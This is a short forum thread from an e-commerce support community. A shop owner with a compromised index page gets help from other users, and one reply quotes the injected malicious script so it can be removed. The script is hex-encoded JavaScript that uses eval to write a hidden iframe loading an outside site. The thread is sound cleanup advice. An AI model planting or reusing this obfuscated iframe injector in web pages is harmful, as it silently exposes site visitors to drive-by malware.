Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Trojan - I think


joyces

Recommended Posts

Hi Everyone

I had a trojan on my index.html page a couple of weeks ago.

It was my own fault as I hadn't set the permissions correctly. My index page sits on the server in public_html and feeds into the catalog folder which also sits at the same level in public_html. Hope that makes sense.

 

I had set the permissions correctly for the catalog folder and as far as I could see the trojan was only on the

index page. I took it down and put up a clean emergency stop-gap page (still there at the moment) and set the permission correctly and as far as I could see all was now ok.

 

I have had an e-mail from one of my reps to say that he gets a warning when he goes to my site:

"A known bad file was blocked from opening index[1].htm (exploit)"

 

I have tried visiting my site from a number of different computers, all with anti-virus, but don't get the warning.

 

Can anyone please have a look at this link and let me know if they get a warning and can anyone tell me whether this means it is a trojan. Also can anyone tell me how I find out which pages are affected.

 

http://www.kingsandqueens.org.uk/catalog/index.php?cPath=64_81

 

Thanks to anyone who can spare the time

 

Joyces

Link to comment
Share on other sites

The index.html in the root of the site has a trojan javascript at the very end of the source.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Joyces,

 

This is the script that needs to be removed:

 

 

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);</script>

 

 

 

Chris

Link to comment
Share on other sites

Thank you both so much. Was so worried couldn't sleep, had to get up and check for replies.

I have removed the code.

When I was checking the permissions on index.html it had reverted back to 777 although I know I changed it to 644 after I re-read Spooks' great thread on how to secure your site.

I think I also read somewhere that some hosts/servers only work on file permissions of 777 and I think the advice was to "change hosts".

Unless anyone knows of an alternative explanation I will pursue that with them tomorrow and if it's true maybe I will then pursue them with a big stick!

Anyway thanks a lot

Joyces

Link to comment
Share on other sites

Joyces,

 

 

Ensure you have removed ALL malicious code and anomalous files. Hackers often place backdoors on servers which give them unrestricted access to your hosting account.

 

 

 

 

 

Chris

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...